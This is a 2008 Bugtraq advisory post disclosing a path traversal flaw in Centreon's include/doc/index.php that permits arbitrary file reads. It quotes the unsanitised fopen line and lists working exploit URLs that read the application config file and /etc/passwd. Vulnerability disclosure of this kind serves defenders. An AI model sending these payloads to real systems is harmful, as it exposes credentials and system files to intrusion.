[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Centreon <= 1.4.2.3 (index.php) Remote File Disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Centreon <= 1.4.2.3 (index.php) Remote File Disclosure
From: sys-project@xxxxxxxxxxx
Date: 29 Feb 2008 15:27:23 -0000

[+] Info:

[~] Software: Centreon <= 1.4.2.3
[~] HomePage: http://www.centreon.com
[~] Exploit: Remote File Disclosure [High]
[~] Where: include/doc/index.php
[~] Bug Found By: Jose Luis Góngora Fernández|JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Spanish Hackers Team [SHT]

[+] Bug In include/doc/index.php:

[~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang()."/".$_GET["page"], 
"r");   

[+] Exploit:

[~] /include/doc/index.php?page=../../www/oreon.conf.php
[~] /include/doc/index.php?page=../../../../../etc/passwd
[~] /include/doc/index.php?page=[Local File]

Prev by Date: Re: Loginwindow.app and Mac OS X
Next by Date: [ MDVSA-2008:055 ] - Updated ghostscript packages fix arbitrary code execution vulnerability
Previous by thread: Ghostscript buffer overflow
Next by thread: [ MDVSA-2008:055 ] - Updated ghostscript packages fix arbitrary code execution vulnerability
Index(es):
- Date
- Thread